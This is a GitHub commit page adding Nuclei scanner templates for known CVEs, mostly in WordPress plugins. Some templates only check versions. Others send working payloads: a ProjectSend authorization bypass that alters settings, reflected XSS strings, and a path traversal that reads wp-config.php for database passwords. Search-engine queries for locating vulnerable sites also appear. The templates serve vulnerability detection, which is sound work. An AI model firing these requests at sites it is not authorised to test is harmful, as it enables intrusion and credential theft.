-
Notifications
You must be signed in to change notification settings - Fork 272
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
89d6187
commit 6100788
Showing
289 changed files
with
16,760 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241126 | ||
20241127 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,64 @@ | ||
id: projectsend-auth-bypass | ||
|
||
info: | ||
name: ProjectSend <= r1605 - Improper Authorization | ||
author: DhiyaneshDK | ||
severity: high | ||
description: | | ||
An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application. | ||
reference: | ||
- https://www.projectsend.org/ | ||
- https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf | ||
metadata: | ||
verified: true | ||
max-request: 1 | ||
fofa-query: body="ProjectSend" | ||
shodan-query: html:"ProjectSend" | ||
tags: misconfig,projectsend,auth-bypass | ||
|
||
variables: | ||
string: "{{randstr}}" | ||
|
||
flow: http(1) && http(2) | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET / HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'status_code == 200' | ||
- 'contains(body, "projectsend")' | ||
condition: and | ||
internal: true | ||
|
||
extractors: | ||
- type: regex | ||
name: csrf | ||
group: 1 | ||
regex: | ||
- 'name="csrf_token" value="([0-9a-z]+)"' | ||
internal: true | ||
|
||
- raw: | ||
- | | ||
POST /options.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
csrf_token={{csrf}}§ion=general&this_install_title={{string}} | ||
- | | ||
GET / HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'status_code_2 == 200' | ||
- 'contains(body_2, "{{string}}")' | ||
condition: and | ||
# digest: 4b0a00483046022100cbdf7867367646663d0f95096da7ed83173ecc5ad6edfbbb81fffd3afe8efcfa0221009cbb5bae0b46406c68174051fdff85191ee72553de70ffbb7e575a1b6c4b4aa1:922c64590222798bb761d5b6d8e72950 |
59 changes: 59 additions & 0 deletions
59
poc/aws/CVE-2024-52475-3edf4604484e3bad3394912718ccec2e.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
id: CVE-2024-52475-3edf4604484e3bad3394912718ccec2e | ||
|
||
info: | ||
name: > | ||
Wawp < 3.0.18 - Unauthenticated Privilege Escalation | ||
author: topscoder | ||
severity: critical | ||
description: > | ||
The Wawp OTP Verification, Order Notifications, and Country Code Selector for WooCommerce plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to 3.0.18 (exclusive). This makes it possible for unauthenticated attackers to gain access to administrator accounts. | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/da86d422-f0ef-439b-ae67-6cb9699073e0?source=api-prod | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2024-52475 | ||
metadata: | ||
fofa-query: "wp-content/plugins/automation-web-platform/" | ||
google-query: inurl:"/wp-content/plugins/automation-web-platform/" | ||
shodan-query: 'vuln:CVE-2024-52475' | ||
tags: cve,wordpress,wp-plugin,automation-web-platform,critical | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/automation-web-platform/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "automation-web-platform" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '< 3.0.18') |
59 changes: 59 additions & 0 deletions
59
poc/config/wp-ispconfig3-787a6b689d770056f7efffb5964871d1.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
id: wp-ispconfig3-787a6b689d770056f7efffb5964871d1 | ||
|
||
info: | ||
name: > | ||
WP-ISPConfig 3 <= 1.5.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting | ||
author: topscoder | ||
severity: medium | ||
description: > | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/5b2813d6-6ef5-4629-b079-bec3ad25d661?source=api-scan | ||
classification: | ||
cvss-metrics: | ||
cvss-score: | ||
cve-id: | ||
metadata: | ||
fofa-query: "wp-content/plugins/wp-ispconfig3/" | ||
google-query: inurl:"/wp-content/plugins/wp-ispconfig3/" | ||
shodan-query: 'vuln:' | ||
tags: cve,wordpress,wp-plugin,wp-ispconfig3,medium | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/wp-ispconfig3/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "wp-ispconfig3" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 1.5.6') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2011-4624 | ||
|
||
info: | ||
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-5181 | ||
info: | ||
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting | ||
author: daffainfo | ||
severity: medium | ||
description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
classification: | ||
cve-id: CVE-2011-5181 | ||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/02/21 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
id: CVE-2013-2287 | ||
info: | ||
name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting | ||
author: daffainfo | ||
severity: medium | ||
description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2013-2287 | ||
- https://www.dognaedis.com/vulns/DGS-SEC-16.html | ||
classification: | ||
cve-id: CVE-2013-2287 | ||
metadata: | ||
google-query: inurl:"/wp-content/plugins/uploader" | ||
tags: cve,cve2013,wordpress,xss,wp-plugin | ||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/02/21 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
id: CVE-2013-7240 | ||
|
||
info: | ||
name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal | ||
author: daffainfo | ||
severity: high | ||
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. | ||
reference: | ||
- https://www.exploit-db.com/exploits/38936 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240 | ||
tags: cve,cve2013,wordpress,wp-plugin,lfi | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2013-7240 | ||
cwe-id: CWE-22 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "DB_NAME" | ||
- "DB_PASSWORD" | ||
- "DB_HOST" | ||
- "The base configurations of the WordPress" | ||
part: body | ||
condition: and | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,41 @@ | ||
id: CVE-2014-4536 | ||
|
||
info: | ||
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting | ||
author: daffainfo | ||
severity: medium | ||
description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. | ||
reference: | ||
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f | ||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536 | ||
- http://wordpress.org/plugins/infusionsoft/changelog | ||
- http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2014-4536 | ||
cwe-id: CWE-79 | ||
tags: cve,cve2014,wordpress,wp-plugin,xss | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '"></script><script>alert(document.domain)</script>' | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/02/24 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
id: CVE-2015-6920 | ||
info: | ||
name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability. | ||
reference: | ||
- https://packetstormsecurity.com/files/133371/ | ||
- https://nvd.nist.gov/vuln/detail/CVE-2015-6920 | ||
tags: cve,cve2015,wordpress,wp-plugin,xss | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '"></script><script>alert(document.domain)</script>' | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 |
Oops, something went wrong.